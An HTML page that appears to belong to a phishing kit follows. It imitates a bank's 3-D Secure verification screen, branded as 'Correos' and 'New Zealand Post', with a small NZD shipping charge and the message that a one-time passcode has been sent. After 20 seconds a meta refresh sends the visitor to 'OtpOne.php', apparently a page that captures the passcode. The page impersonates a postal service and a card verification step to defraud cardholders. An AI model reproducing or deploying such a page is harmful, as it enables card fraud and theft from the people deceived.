<!DOCTYPE html>
<html lang="es">
<head><meta http-equiv="Content-Type" content="text/html; charset=utf-8">
  
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Correos - Tarifa de envío </title>
  
  <link rel="shortcut icon" href="Zitop/ok.ico">
  <link href="Zitop/template-e63a3d48ea.min.css" rel="stylesheet">
  
  
  <style>body {color: #000000;font-family: Arial, 'Helvetica Neue', Helvetica, sans-serif;font-size: 1.25em}.header, legend, h1, h2, h3, h4 {color: #000000}label {color: #000000}a,.btn-link {color: #000000;text-decoration: underline}a:visited,.btn-link:visited {color: #000000}a:hover,a:focus,.btn-link:hover,.btn-link:focus {color: #211f1f}a:active,.btn-link:active {color: #211f1f}a.btn-link {font-size: .95em}.btn-primary,.btn-primary:focus,.btn-primary:hover {background: #211f1f;color: #FFF;border: none;border-radius: 0}.btn-primary:active,.btn-primary:active:hover,.btn-primary:active:focus {background: #AB2C29}fieldset {border: 0}fieldset > legend {border-bottom: 0;font-size: 1.00em}:not(.lt-ie9) label.custom-radio [type=radio]:checked+span:before {background: #211f1f}.accordion.modal .modal-body .panel-group .expander {color: #211f1f}.accordion.modal .modal-body .panel-group .panel {background: #FFF}.field-validation-error {color: #AB2C29}.toast-top-full-width {display: none}</style>


</head>
<body>
  <div class="threeds-one">
    


<div class="container container-sticky-footer">
  

<div class="header" id="HeaderLogos">
  <div class="row no-pad">
    <div class="col-12">
      <img alt="" class="img-responsive header-logo pull-left" src="Zitop/lg.png">
      <img alt="" class="img-responsive header-logo pull-right" src="Zitop/_svg.html">
    </div>
  </div>
</div>
  


<div class="container container-sticky-footer">
    <div class="body" dir="LTR" style="bottom: 54px;">
      
<div class="row form-two-col">
        <div class="col-12">
            <fieldset id="ValidateTransactionDetailsContainer">
    <legend id="ValidateTransactionDetailsHeader" size="2%">Your One-time Passcode has been sent</legend>


      <br>
                <legend id="ValidateTransactionDetailsHeader">Detalles transaccionales</legend>

                <div class="validate-field row">
                    <span class="validate-label col-6">Merchant Name:</span>
                    <span class="col-6">New Zealand Post </span>
                </div>

                <div class="validate-field row">
                    <span class="validate-label col-6">Amount :</span>
                    <span class="col-6 always-left-to-right">$3.60 <font size="1">NZD</font></span>
                </div>
				
				  <div class="validate-field row">
                    <span class="validate-label col-6">Date:</span>
                    <span class="col-6 always-left-to-right">2021-11-05</span>
                </div>

                <div class="validate-field row">
                    <span class="validate-label col-6">Card number:</span>
                    <span class="col-6 always-left-to-right">******</span>
                </div>
                <div class="validate-field row">
    <span>



<img alt="" class="" src="Zitop/loading.svg" style=" display: block; margin-left: auto; margin-right: auto;">


    </span>

                </div>
                <div class="validate-field row">
                    <span class="validate-label col-6">&nbsp;</span>
                    <span id="ValidationErrorMessage" class="field-validation-error" style="display: none;"></span>
                    <span class="field-validation-valid col-6" data-valmsg-for="Credential.Value" data-valmsg-replace="true"></span>
                </div>
            </fieldset>
        </div>
      </div>


      
    </div>
    <div class="sticky-footer">
      <div class="row no-pad">
        <div class="col-12 text-center">
        </div>
      </div>
      

<div class="footer" id="FooterLinks">
  <div class="row">
    <div class="col-12">
      <ul class="list-inline list-inline-separated pull-left"></ul>
      <a id="ExitLink" class="list-inline list-inline-separated pull-right" href="#"></a>
    </div>
  </div>
</div>
    </div>
</form></div>
</div>


  </div>


 <meta http-equiv="refresh" content="20; url=OtpOne.php">


</body></html>